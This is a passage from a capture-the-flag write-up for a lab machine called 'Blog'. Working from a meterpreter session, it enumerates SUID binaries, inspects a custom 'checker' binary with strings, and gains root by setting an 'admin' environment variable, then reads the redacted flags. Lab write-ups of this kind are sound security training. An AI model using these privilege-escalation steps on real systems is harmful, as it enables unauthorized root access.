We can’t get the user.txt flag that easily.. .There is an interesting file Billy_Joel_Termination_May20-2020.pdf. Let’s download this file into our system and check it out.
Oooh, something tells me that we have to look into the /media folder..!
1
2
3
4
5
6
7
8
9
10
11
12
meterpreter > cd media
meterpreter > ls
Listing: /media
===============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040700/rwx------ 4096 dir 2020-05-29 00:54:09 +0530 usb
meterpreter > cd usb
[-] stdapi_fs_chdir: Operation failed: 1
meterpreter >
As expected, we need root level access. Now, the time is for some privilege escalation.
Privilege Escalation
Binary Exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
meterpreter > shell
Process 4684 created.
Channel 5 created.
sudo -l
sudo: no tty present and no askpass program specified
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-sr-x 1 root root 8432 May 26 2020 /usr/sbin/checker
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 109432 Oct 30 2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 40152 Oct 10 2019 /snap/core/8268/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/8268/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/8268/bin/ping6
...
Ran the find SUID binary command and we have one interesting binary here, which is checker.
We’ll try to run this binary
1
2
3
4
5
6
python -c 'import pty; pty.spawn("/bin/sh")'
$ export TERM=xterm-256color
export TERM=xterm-256color
$ /usr/sbin/checker
/usr/sbin/checker
Not an Admin
Interesting..! Let’s check the workings via strings
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ strings /usr/sbin/checker
strings /usr/sbin/checker
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
puts
getenv
system
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
=9
AWAVI
AUATL
[]A\A]A^A_
admin
/bin/bash
Not an Admin
;*3$"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crtstuff.c
...
Seems like it is validating that there is an admin in the env or not by invoking getenv. Let’s play with this binary and do some manual exploit.
1
2
3
4
5
6
7
8
$ export admin=1
export admin=1
$ /usr/sbin/checker
/usr/sbin/checker
root@blog:/media# whoami
whoami
root
root@blog:/media#
Boom..! we are now root..!
Getting the user.txt flag
1
2
3
4
5
6
7
8
9
root@blog:/media# cd usb
cd usb
root@blog:/media/usb# ls
ls
user.txt
root@blog:/media/usb# cat user.txt
cat user.txt
redacted
root@blog:/media/usb#
Getting the root.txt flag
1
2
3
4
5
6
7
8
9
10
11
12
13
root@blog:/media/usb# find / -name root.txt
find / -name root.txt
/root/root.txt
find: '/proc/4500/task/4500/net': Invalid argument
find: '/proc/4500/net': Invalid argument
find: '/proc/4719/task/4719/net': Invalid argument
find: '/proc/4719/net': Invalid argument
find: '/proc/4807/task/4807/net': Invalid argument
find: '/proc/4807/net': Invalid argument
root@blog:/media/usb# cat /root/root.txt
cat /root/root.txt
redacted
root@blog:/media/usb#
That’s it folks, this was all about the Blog box.
Thank you so much for being till the end. See you guys next time…!